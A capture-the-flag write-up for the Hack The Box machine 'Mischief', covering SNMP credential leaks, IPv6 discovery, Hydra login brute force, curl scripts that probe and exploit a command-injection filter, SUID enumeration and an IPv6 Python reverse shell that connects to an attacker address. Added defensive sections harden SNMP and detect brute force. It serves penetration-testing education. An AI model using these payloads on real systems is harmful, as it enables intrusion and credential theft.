Hello people,

First writeup for an Insane box! I learned tons from this machine. So many strong, basic enumeration techniques that are crucial to building a solid methodology can be used here, to such an extent that the box feels easy in parts just by enumerating tightly.

There is a cool combo of two wee scripts by 0xdf that can be used to enumerate and execute bash commands over an RCE vector. They are very fun and a great foundation for your future scripts and for improving recon in general. I also used a few tricks from GatoGamer1155, who makes some of the best content in the Hispano-American scene.

There is also tons of documentation about SNMP here; understanding deeply how this protocol is used and how its components communicate is crucial. MIBs are so important that you should have their packages installed on every setup by default. SNMP agents' architecture patterns come with plenty of documentation to enumerate all their daemons, and this protocol can behave as a proxy between IPv4 and IPv6 interfaces.

The SNMP version on this box is v2c, while the latest version is v3. The latter adds proper authentication and encryption of the messages, but we are not worried about that here.

So far, this is the machine I would recommend if someone asked for the best first Insane box.
Start like always by creating a directory to work on the machine and running the first nmap scan. Just port 22 and port 3366, running HTTP.

We can take a look at port 3366, but there is barely anything there, just something on adminsub. The page only prints some old Trojan reports. The HTTP service is a login page served by a Python SimpleHTTPServer. Curl it to check its response:

curl -s -k -v -i 10.10.10.92:3366

It asks for authentication and the response is plain text; the banner reads like a Radicale calendar and contacts server (Python). Seems like some kind of office device, with a contact list for login sessions and a calendar for scheduled tasks and days of the week. It must be managed somehow, maybe from a different interface or through a protocol we have not looked at yet, so let's check for UDP activity:

sudo nmap -sU --top-ports 100 -T5 -v -n -Pn 10.10.10.92
Port 161 is open, running SNMP over UDP.

#Look closely
sudo nmap -sU -p 161 -sC 10.10.10.92

Loki is hosting the show: SNMP is leaking over UDP, and the HTTP server is leaking too. A process with id 757 shows the password in plaintext right in front of us.
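The leak above is possible because a read-only community that anyone can query exposes HOST-RESOURCES-MIB::hrSWRunTable, and with it every process's full command line. As an added illustration (not the box's actual snmpd.conf, and not part of the original writeup), here is the weak net-snmp configuration the box behaves like, next to a hardened one. The community string, the management IP and network, and the SNMPv3 passphrases are placeholders.

```conf
# --- Weak (what the box behaves like) ---
# A read-only community "public" answered on every interface exposes the whole
# tree, including hrSWRunTable (process name, path and arguments), which is
# where the plaintext password in the python server's arguments showed up.
rocommunity public

# --- Hardened ---
# 1. Only answer on the management address instead of every interface.
agentAddress udp:10.0.0.5:161                  # placeholder management IP

# 2. Define a view that exposes the system group and host system info only.
view systemonly included .1.3.6.1.2.1.1        # SNMPv2-MIB::system
view systemonly included .1.3.6.1.2.1.25.1     # HOST-RESOURCES-MIB::hrSystem
# hrSWRunTable (.1.3.6.1.2.1.25.4.2) is deliberately left out of the view.

# 3. Bind a non-default community to a source network and to that view.
rocommunity ReplaceWithRandomString 10.0.0.0/24 -V systemonly   # placeholders

# 4. Prefer SNMPv3 with authentication and encryption (authPriv) where the
#    manager supports it; the user is also limited to the same view.
createUser monitor SHA "ReplaceWithAuthPassphrase" AES "ReplaceWithPrivPassphrase"
rouser monitor priv -V systemonly
```

The view keeps the process table away from the community, but the root cause is the service taking its password as a command-line argument: any local user can read that from /proc regardless of SNMP, so the proper fix is to move the secret into a file readable only by the service account.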
Can we get a web shell? An Apache process is also running without any known open port, maybe locally for an internal network. We can even see the systemd PID.

Let's log in with the credentials we got. More credentials: same user name, different passwords. I can't ssh in with them.

Passwords are for logins, logins are sessions, and sessions run on services. I can see systemd from the machine and I know it is also hosting an Apache server, maybe internally, or maybe on a different interface.
SNMP is an interesting protocol; if we want to enumerate it properly, we need to understand how it works. Look at its components (I asked ChatGPT for a summary):

SNMP agents are software agents or processes running on network devices that expose information about the device's status, configuration, and performance. The data is organised according to the structure defined in MIBs.

SNMP managers are systems or applications used for network management that send SNMP requests to SNMP agents to retrieve information or perform actions on network devices.

MIBs are used as a reference by both SNMP managers and agents to ensure that they understand the structure and meaning of the data being exchanged, making the information human-readable. MIBs provide a standardized way to represent and describe the information that can be managed using SNMP.

They communicate using SNMP messages. By looking at the wiki it doesn't seem like we are dealing with SNMP v3.
MIB packages help make SNMP enumeration more efficient. You can request specific information from devices rather than retrieving entire tables of data, which reduces unnecessary network traffic. Instead of guessing OIDs or conducting exhaustive scans, you can refer to MIBs to understand the structure and hierarchy of managed objects, making enumeration more precise and targeted. MIBs make SNMP data human-readable and provide the object names you use in commands to query agents.

Download the packages and comment out the mibs line in the SNMP client config file so they get loaded:

sudo apt install snmp-mibs-downloader

Worth reading HackTricks' article about SNMP pentesting and extra documentation about MIBs.
#Big chunk
snmpwalk -v 2c -c public 10.10.10.92
#Processes
snmpbulkwalk -v2c -c public 10.10.10.92 hrSWRunName
#Everything about one process (the table rows are indexed by PID)
snmpbulkwalk -v2c -c public 10.10.10.92 hrSWRunTable | grep <PID>
#Interfaces
snmpbulkwalk -v2c -c public 10.10.10.92 ipAddressType
There is an IPv6 interface right there. We can find more documentation about SNMP agents acting like proxies between IPv4 and IPv6; there are plenty of references to this proxy feature, and it is also mentioned on the wiki for software agents.

From the snmpbulkwalk scan it seems there is an IPv6 address if we delete the extra colons:

"de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:34:6c"
#Delete the extra colons and compress the zero groups
"dead:beef::250:56ff:feb9:346c"
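To see why grepping hrSWRunTable by PID works and how the ipAddressType index turns into the address derived by hand above, here is an added example, not code from the writeup, that parses snmpbulkwalk-style output. The sample lines are constructed in the shape of the walks on this page; the process list, the arguments and the credential value in them are invented. It also carries an auditor's check that flags processes whose arguments look like a user:password token, which is the exposure the box demonstrates.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample of snmpbulkwalk output: same shape as the walks on the page,
# but the process list, the arguments and the credential value are invented.
SAMPLE_WALK = """\
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunPath.1 = STRING: "/sbin/init"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: ""
HOST-RESOURCES-MIB::hrSWRunName.757 = STRING: "python"
HOST-RESOURCES-MIB::hrSWRunPath.757 = STRING: "python"
HOST-RESOURCES-MIB::hrSWRunParameters.757 = STRING: "-m SimpleHTTPAuthServer 3366 loki:Constructed-Pa55w0rd"
IP-MIB::ipAddressType.ipv4."10.10.10.92" = INTEGER: unicast(1)
IP-MIB::ipAddressType.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:34:6c" = INTEGER: unicast(1)
"""

# One walk line: MODULE::object.index = TYPE: value
LINE_RE = re.compile(
    r'^(?P<mib>[\w-]+)::(?P<obj>\w+)\.(?P<index>.+?) = (?P<type>[A-Za-z0-9-]+): ?(?P<value>.*)$'
)


def parse_walk(text):
    """Return (object, index, value) triples; STRING values lose their quotes."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        value = m.group("value")
        if m.group("type") == "STRING" and len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        rows.append((m.group("obj"), m.group("index"), value))
    return rows


def processes(rows):
    """Group the hrSWRun* columns by PID: the integer suffix is the row index
    that 'grep <PID>' on hrSWRunTable is matching."""
    procs = defaultdict(dict)
    for obj, index, value in rows:
        if obj.startswith("hrSWRun") and index.isdigit():
            procs[int(index)][obj[len("hrSWRun"):].lower()] = value
    return dict(procs)


def ipv6_from_index(index):
    """Turn the ipAddressType.ipv6 index (16 colon-separated octets) into an
    address: drop the colons, parse the 16 bytes, and let ipaddress compress
    the zero groups exactly as the page did by hand."""
    hexdigits = index.strip('"').replace(":", "")
    if len(hexdigits) != 32:
        raise ValueError(f"not a 16-octet IPv6 index: {index}")
    return str(ipaddress.IPv6Address(bytes.fromhex(hexdigits)))


def ipv6_addresses(rows):
    """Collect every IPv6 address the agent reports in ipAddressType."""
    return [ipv6_from_index(index[len("ipv6."):])
            for obj, index, _ in rows
            if obj == "ipAddressType" and index.startswith('ipv6."')]


# Auditor's heuristic: a user:secret token in hrSWRunParameters means the credential
# is readable by anyone who knows the community string (and by local users via /proc).
CRED_RE = re.compile(r"\b[\w.-]+:[^\s:]{4,}")


def leaking_processes(procs):
    """PIDs whose command-line arguments contain something shaped like user:password."""
    return sorted(pid for pid, p in procs.items()
                  if CRED_RE.search(p.get("parameters", "")))


if __name__ == "__main__":
    rows = parse_walk(SAMPLE_WALK)
    for pid, p in sorted(processes(rows).items()):
        print(pid, p.get("name"), p.get("parameters"))
    print("IPv6:", ipv6_addresses(rows))
    print("processes exposing credentials:", leaking_processes(processes(rows)))
```

Feed it the real walk by reading the snmpbulkwalk output from a file instead of SAMPLE_WALK; the credential regex is deliberately loose and will also match things like host:port pairs, so treat its hits as candidates to review rather than findings.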
Running nmap against the IPv6 address we get ports 22 and 80 open. Add it to /etc/hosts or use [ipv6] directly, it's up to you, and check the HTTP server.

Can't use the credentials we got (loki:trickeryanddeceit), but I can brute-force the login with Hydra:

hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P passwords.txt mischief.htb http-post-form "/login.php:user=^USER^&password=^PASS^:Sorry"

There is a match for administrator.
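From the other side of the wire, a run like the Hydra command above leaves a burst of POSTs to /login.php from one client in the web server's access log. As an added example, not part of the original writeup, here is a small detector over constructed Apache combined-format log lines: it keeps a sliding window per client address and reports the moment a client reaches a threshold of POSTs to the login path. The addresses, timestamps, request counts and threshold are all invented for the demonstration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" access-log line (only the fields the detector needs).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_bruteforce(lines, path="/login.php", window_s=60, threshold=20):
    """Sliding-window counter per client address.

    Returns {ip: timestamp} for every client whose number of POSTs to `path`
    within any `window_s`-second window reached `threshold`; the timestamp is
    the request that crossed the line, i.e. when an alert would fire."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent POSTs
    alerts = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or ev["path"] != path:
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        # drop everything older than the window relative to this request
        while (ev["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold and ev["ip"] not in alerts:
            alerts[ev["ip"]] = ev["ts"]
    return alerts


def constructed_log():
    """Constructed sample: 25 login POSTs in 25 seconds from one client,
    plus one normal login and one page view from another. Not real traffic."""
    fmt = "%d/%b/%Y:%H:%M:%S %z"
    base = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(25):
        ts = (base + timedelta(seconds=i)).strftime(fmt)
        lines.append(f'2001:db8::1 - - [{ts}] "POST /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"')
    ts = (base + timedelta(seconds=5)).strftime(fmt)
    lines.append(f'2001:db8::2 - - [{ts}] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    lines.append(f'2001:db8::2 - - [{ts}] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, when in detect_bruteforce(constructed_log()).items():
        print(f"{when.isoformat()} possible credential brute force against /login.php from {ip}")
```

Counting POSTs rather than failed responses keeps the check independent of how the application signals a bad login (here a 200 with "Sorry" in the body, which never reaches the access log); in production you would pair it with a lockout or rate limit on the login handler itself, since the detector only tells you after the fact.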
We get command execution, but some commands are blacklisted, and the word "credentials" is blacklisted too.

0xdf wrote a cool script to enumerate which commands are not blacklisted using curl:

#!/bin/bash
#By 0xdf
#Create a list with the commands you want to test and pass it as the argument
#Replace IPV6 with the target address and IDNUM with your PHPSESSID cookie value
command_file=$1
for cmd in $(cat "${command_file}"); do
    curl -s -6 -X POST "http://[IPV6]:80/" -H "Cookie: PHPSESSID=IDNUM" -d "command=${cmd}" | grep -q "Command is not allowed."
    if [ $? -eq 1 ]; then
        echo -e " \e[42m${cmd}\e[49m allowed";
    else
        echo -e " \e[41m${cmd}\e[49m blocked";
    fi;
done

By creating a list we can enumerate what is allowed by the application. Now we can use his second script to execute commands; these two scripts are very good for further modification depending on the situation and make a really good combo.
#!/bin/bash
#By 0xdf. Usage: ./cmd.sh <ipv6> "<command>"
ip=$1
cmd=$2
curl -s -6 -X POST "http://[${ip}]:80/" -d "command=${cmd};" | grep -F "</html>" -A 10 | grep -vF -e "</html>" -e "Command was executed succesfully!"
0xdf uses the wildcard character ? to bypass the filename being blacklisted and still read the file, by putting the actual filename inside quotes when doing the curl. GatoGamer1155 uses a similar technique with * directly on the web shell. Simple, cool tricks that we can use after having done a strong enumeration.

Dope, this way we can ssh in as Loki and get the user flag.
Every time you want to escalate your privileges, build the good habit of running commands to enumerate files and permissions:

#SUID
find / -perm -4000 -type f 2>/dev/null
#Passwords
grep -iR "pass" *
grep -r "password" .
In this case, looking at the SUIDs, we can find multiple vectors that could be exploited. pkexec can be exploited with PwnKit, and probably more if you dig into the binaries on GTFOBins.

The Python server keeps leaking passwords, this time in the bash history. You could use the history command itself and you would see the password close to free -mt. Good practice to always check the bash history.

Another simple way to keep enumerating binaries is getfacl.

We can use the previous script from 0xdf to enumerate su and sudo on the web shell. Green light means we should be rooting with the leaked password. We just need a proper shell first; shouldn't be too hard to get a reverse shell.
Make sure you have a proper setup to start listeners on IPv6. You can try netcat-openbsd configured properly, or just use socat, which provides an easier way to listen on IPv6 from the get-go:

socat TCP6-LISTEN:1234,bind=::,fork -

Craft the payload easily by grabbing an IPv6 Python reverse shell. Take any revshell, change AF_INET to AF_INET6 and add ; at the end:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("IPV6",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
#Add your IPv6 and port and remember adding ; at the end
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1010",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Execute. The flag is not around, but we can enumerate files like champs:

find / -name root.txt 2>/dev/null